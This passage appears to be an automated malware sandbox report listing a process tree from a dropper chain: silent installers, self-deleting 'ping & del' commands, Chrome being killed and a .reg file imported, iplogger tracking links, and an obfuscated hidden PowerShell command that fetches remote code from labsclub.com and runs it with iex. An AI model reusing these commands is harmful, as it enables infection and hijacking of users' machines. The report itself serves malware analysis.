- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2440 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:4528
-
-
C:\Users\Admin\AppData\Roaming\1614544539114.exe"C:\Users\Admin\AppData\Roaming\1614544539114.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544539114.txt"6⤵PID:2752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:2964
-
-
C:\Users\Admin\AppData\Roaming\1614544544161.exe"C:\Users\Admin\AppData\Roaming\1614544544161.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544544161.txt"6⤵PID:4788
-
-
C:\Users\Admin\AppData\Roaming\1614544554568.exe"C:\Users\Admin\AppData\Roaming\1614544554568.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544554568.txt"6⤵PID:4160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵PID:5128
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\is-697EL.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-697EL.tmp\23E04C4F32EF2158.tmp" /SL5="$20190,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:4260
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:3456
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:5932
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:5704
-
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:6592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"6⤵PID:4836
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:5280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exeC:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 200 installp15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2740 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4248
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"6⤵PID:4908
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:2052
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵PID:2888
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe" 1 3.1614544755.603bff7369dfa 1016⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YW3Q4ZLQ12\multitimer.exe" 2 3.1614544755.603bff7369dfa7⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\c2td3krpacl\safebits.exe"C:\Users\Admin\AppData\Local\Temp\c2td3krpacl\safebits.exe" /S /pubid=1 /subid=4518⤵PID:4456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 6849⤵
- Program crash
PID:6500
-
-
-
C:\Users\Admin\AppData\Local\Temp\avk00uufhay\vict.exe"C:\Users\Admin\AppData\Local\Temp\avk00uufhay\vict.exe" /VERYSILENT /id=5358⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\is-5D1AL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-5D1AL.tmp\vict.tmp" /SL5="$90084,870426,780800,C:\Users\Admin\AppData\Local\Temp\avk00uufhay\vict.exe" /VERYSILENT /id=5359⤵PID:4728
-
C:\Users\Admin\AppData\Local\Temp\is-C33F5.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-C33F5.tmp\wimapi.exe" 53510⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\avi2dJqrZ.exe"C:\Users\Admin\AppData\Local\Temp\avi2dJqrZ.exe"11⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\avi2dJqrZ.exe"C:\Users\Admin\AppData\Local\Temp\avi2dJqrZ.exe"12⤵PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7200
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\keaqodbp0l1\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\keaqodbp0l1\setup_10.2_us3.exe" /silent8⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\is-NM3GP.tmp\setup_10.2_us3.tmp"C:\Users\Admin\AppData\Local\Temp\is-NM3GP.tmp\setup_10.2_us3.tmp" /SL5="$40210,746887,121344,C:\Users\Admin\AppData\Local\Temp\keaqodbp0l1\setup_10.2_us3.exe" /silent9⤵PID:4716
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s110⤵PID:4568
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"11⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1Gusg7"10⤵PID:4940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5bocwfr3lzc\3yspnrsysbl.exe"C:\Users\Admin\AppData\Local\Temp\5bocwfr3lzc\3yspnrsysbl.exe" 57a764d042bf88⤵PID:4536
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\8ASWIT8KJQ\5RTCYVG6C.exe" 57a764d042bf8 & exit9⤵PID:5696
-
C:\Program Files\8ASWIT8KJQ\5RTCYVG6C.exe"C:\Program Files\8ASWIT8KJQ\5RTCYVG6C.exe" 57a764d042bf810⤵PID:3940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pxjynkpuil2\4rnj1u1ndfv.exe"C:\Users\Admin\AppData\Local\Temp\pxjynkpuil2\4rnj1u1ndfv.exe" testparams8⤵PID:4632
-
C:\Users\Admin\AppData\Roaming\axraohzr52p\p1guoohfgag.exe"C:\Users\Admin\AppData\Roaming\axraohzr52p\p1guoohfgag.exe" /VERYSILENT /p=testparams9⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\is-RK5OQ.tmp\p1guoohfgag.tmp"C:\Users\Admin\AppData\Local\Temp\is-RK5OQ.tmp\p1guoohfgag.tmp" /SL5="$20244,1611272,61440,C:\Users\Admin\AppData\Roaming\axraohzr52p\p1guoohfgag.exe" /VERYSILENT /p=testparams10⤵PID:5056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3cqb1ddmrws\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3cqb1ddmrws\Setup3310.exe" /Verysilent /subid=5778⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\is-GS37E.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-GS37E.tmp\Setup3310.tmp" /SL5="$70216,802346,56832,C:\Users\Admin\AppData\Local\Temp\3cqb1ddmrws\Setup3310.exe" /Verysilent /subid=5779⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\is-QNII7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QNII7.tmp\Setup.exe" /Verysilent10⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\is-GMOCO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GMOCO.tmp\Setup.tmp" /SL5="$701E0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-QNII7.tmp\Setup.exe" /Verysilent11⤵PID:4852
-
C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\ProPlugin.exe" /Verysilent12⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\is-E15FA.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-E15FA.tmp\ProPlugin.tmp" /SL5="$2017C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\ProPlugin.exe" /Verysilent13⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\is-R6OAM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R6OAM.tmp\Setup.exe"14⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"15⤵PID:1732
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe16⤵
- Kills process with taskkill
PID:4384
-
-
C:\Windows\regedit.exeregedit /s chrome.reg16⤵
- Runs .reg file with regedit
PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat16⤵PID:1040
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)17⤵PID:4040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"18⤵PID:6228
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"19⤵PID:6432
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff947406e00,0x7ff947406e10,0x7ff947406e2020⤵PID:6444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1668 /prefetch:820⤵PID:7092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:220⤵PID:7084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:120⤵PID:6232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:120⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3536 /prefetch:820⤵PID:3584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:120⤵PID:6648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:120⤵PID:6356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:120⤵PID:4544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:120⤵PID:6164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:820⤵PID:6752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:820⤵PID:816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:820⤵PID:5716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4992 /prefetch:820⤵PID:7180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:820⤵PID:7492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 /prefetch:820⤵PID:7604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5076 /prefetch:820⤵PID:6072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:820⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3640 /prefetch:820⤵PID:6880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3672 /prefetch:820⤵PID:5628
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings20⤵PID:7212
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff638a77740,0x7ff638a77750,0x7ff638a7776021⤵PID:2328
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:820⤵PID:5144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4364 /prefetch:820⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 /prefetch:820⤵PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:820⤵PID:2140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:820⤵PID:6408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:820⤵PID:7708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3396 /prefetch:820⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:820⤵PID:6116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:820⤵PID:6984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4172 /prefetch:820⤵PID:7016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:820⤵PID:2552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:820⤵PID:7988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:820⤵PID:2336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 /prefetch:820⤵PID:6748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5448 /prefetch:820⤵PID:3532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:820⤵PID:7036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:820⤵PID:8112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:820⤵PID:6756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5720 /prefetch:820⤵PID:8136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:120⤵PID:3384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:820⤵PID:5216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3440 /prefetch:820⤵PID:6780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:820⤵PID:1748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4004 /prefetch:820⤵PID:512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=844 /prefetch:820⤵PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3208 /prefetch:820⤵PID:7228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:820⤵PID:6912
-
-
